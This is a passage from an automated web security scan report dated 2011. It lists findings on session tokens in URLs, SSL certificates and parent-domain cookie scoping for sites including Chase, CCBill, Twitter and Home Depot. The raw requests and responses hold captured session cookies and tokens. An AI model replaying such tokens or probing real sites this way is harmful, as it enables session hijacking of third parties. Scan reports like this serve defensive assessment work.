Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /LocatorAction.do;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
   <img src="/images/logo107x20.gif;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.8. https://locator.chase.com/images/logo107x20.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /images/logo107x20.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/logo107x20.gif;jsessionid=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:08 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1983-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 1983
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89ak...............@@@>>>....y.~~~.z.?...y..............z....///.x.......@.....___.x..x.....z.......ppp.z.......?...z..z..w.=..ooo.......y........x.@.....?..@........A..@............{..y....=...
...[SNIP]...

8.9. https://locator.chase.com/jsp/SearchPage.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /jsp/SearchPage.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /jsp/SearchPage.jsp HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
   <img src="/images/logo107x20.gif;jsessionid=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.10. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.akqa.com%2F&callback=_xdc_._txgsed&token=4345 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 12 Jul 2011 15:33:06 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._txgsed && _xdc_._txgsed( [1] )

9. SSL certificate  previous  next
There are 7 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://store.popcap.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://store.popcap.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  store.popcap.com
Issued by:  DigiCert High Assurance EV CA-1
Valid from:  Thu Sep 02 19:00:00 CDT 2010
Valid to:  Sun Nov 06 17:59:59 CST 2011

Certificate chain #1

Issued to:  DigiCert High Assurance EV CA-1
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Thu Nov 09 18:00:00 CST 2006
Valid to:  Tue Nov 09 18:00:00 CST 2021

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

9.2. https://admin.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  admin.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Tue Dec 07 18:00:00 CST 2010
Valid to:  Thu Jan 12 17:59:59 CST 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.3. https://affiliateadmin.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  affiliateadmin.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Sun Dec 05 18:00:00 CST 2010
Valid to:  Thu Dec 15 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.4. https://bill.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bill.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  bill.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Tue Dec 07 18:00:00 CST 2010
Valid to:  Thu Jan 19 17:59:59 CST 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.5. https://support.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Sun Aug 15 19:00:00 CDT 2010
Valid to:  Tue Aug 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.6. https://www.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Tue Jul 27 19:00:00 CDT 2010
Valid to:  Thu Aug 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.7. https://www.lowes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.lowes.com,ST=North Carolina
Issued by:  Akamai Subordinate CA 3
Valid from:  Mon Sep 13 16:28:46 CDT 2010
Valid to:  Tue Sep 13 16:28:46 CDT 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

10. Cookie scoped to parent domain  previous  next
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://login.dotomi.com/ucm/UCMController  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_ref=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate%3Fcheck%3D*n%26jspStoreDir%3Dhdus%26contractId%3D2081191%26itemAdd%3Dtrue%26orderId%3D131526257%26quantity%3D1%26catalogId%3D10053%26orderItemId%3D339315499%26langId%3D-1%26URL%3DOrderItemDisplayViewShiptoAssoc%26catEntryId%3D202349118%26storeId%3D10051%26calculationUsageId%3D-1%26calculationUsageId%3D-2%26calculationUsageId%3D-5%26calculationUsageId%3D-6%26calculationUsageId%3D-7%26calculationUsageId%3D-8%26calculationUsageId%3D-9&dtmc_url=http%3A//www6.homedepot.com/how-to/index.html& HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www6.homedepot.com/how-to/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1310488553942310; DotomiRR2339=-1$1$1$; DotomiUser=330100732990473967$0$335422886; DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489049679; DotomiNet=2$DjQqblZ1RHBFAGVVBwt9WgdHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGNTeGNlUHFRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:53:44 GMT
X-Name: dmc-o08
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
Set-Cookie: DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489624594; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1RHBFAGZZAQZ%2BVAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGBffm5mXnRRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
Set-Cookie: DotomiRR2339=-1$1$1$; Domain=.dotomi.com; Expires=Wed, 13-Jul-2011 16:53:44 GMT; Path=/
Content-Type: text/html
Content-Length: 1521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

10.2. http://scribe.twitter.com/scribe  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://scribe.twitter.com
Path:   /scribe

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scribe?q=0241&log%5B%5D=%7B%22event_name%22%3A%22subnav%22%2C%22item%22%3A%22tweets%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22webclient%22%2C%22ts%22%3A1310519091845%7D&log%5B%5D=%7B%22event_name%22%3A%22web%3Aprofile%3A%3A%3Aimpression%22%2C%22noob_level%22%3Anull%2C%22internal_referer%22%3Anull%2C%22profile_id%22%3A61504755%2C%22context%22%3A%22profile%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22client_event%22%2C%22ts%22%3A1310519091867%7D&log%5B%5D=%7B%22event_name%22%3A%22stream-view%22%2C%22stream_name%22%3A%22User%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22webclient%22%2C%22ts%22%3A1310519091888%7D HTTP/1.1
Host: scribe.twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1310208653927867; __utma=43838368.1598605414.1305368954.1310393759.1310519089.15; __utmb=43838368.1.10.1310519089; __utmc=43838368; __utmz=43838368.1310519089.15.8.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/cybersecurity/; __utmv=43838368.lang%3A%20en; _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MzoMY3NyZl9pZCIlYzhlNzI5MTQ0Nzk1YjU0%250ANDhkNjk4YzJkMWFmMzQ1ZmUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f85f91307c1e2d3da5ae66c2d365ecfdde397c4f

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:05:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310519144-24311-9025
ETag: "db04c7b378cb2db912c3ba8a5a774ee3"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:05:44 GMT
Content-Transfer-Encoding: binary
X-Runtime: 0.01606
Content-Disposition: inline
Content-Type: image/gif; charset=utf-8
Content-Length: 43
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: b8a7614452c3d5517e8d7c8394afa4eff3f942eb
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MzoMY3NyZl9pZCIlYzhlNzI5MTQ0Nzk1YjU0%250ANDhkNjk4YzJkMWFmMzQ1ZmUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f85f91307c1e2d3da5ae66c2d365ecfdde397c4f; domain=.twitter.com; path=/; HttpOnly
Connection: close

GIF89a.............!.......,...........D..;

10.3. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&catalogId=10053&quantity=1&orderItemId_0=339315499&orderItemId=339315499&langId=-1&catEntryId=202349118&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; VISITORID=910187893; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=2; s_pers=%20s_campaign%3Dno%2520value%7C1310490955491%3B%20s_prevPage%3Dmostpopular%7C1310490955494%3B%20p_30%3DCategory%7C1310490955496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Dmostpopular%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Emostpopular%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Dmostpopular%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_6%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489156635%3a%3bC25%5fEXP%3d1362329156%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WCS_UNIQUE_ID=yDNOewjWomI76%2bqwH5XtmS%2f3xy4%3d%0a; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492756905%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2c3eMnbb1h3WdO2u5VxBUQ9gMGN8U%3d

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Location: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&quantity=1&catalogId=10053&orderItemId=339315499&orderItemId_0=339315499&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202349118&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Tue, 12 Jul 2011 16:45:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 16:45:57 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489157221%3a%3bC25%5fEXP%3d1362329157%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529;Domain=.homedepot.com;Expires=Sun, 03-Mar-2013 16:45:57 GMT;Path=/
Set-Cookie: WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492757250%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cdUmHi5LdyePSUlqCjwXXsfwRdqQ%3d;Domain=.homedepot.com;Path=/


10.4. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

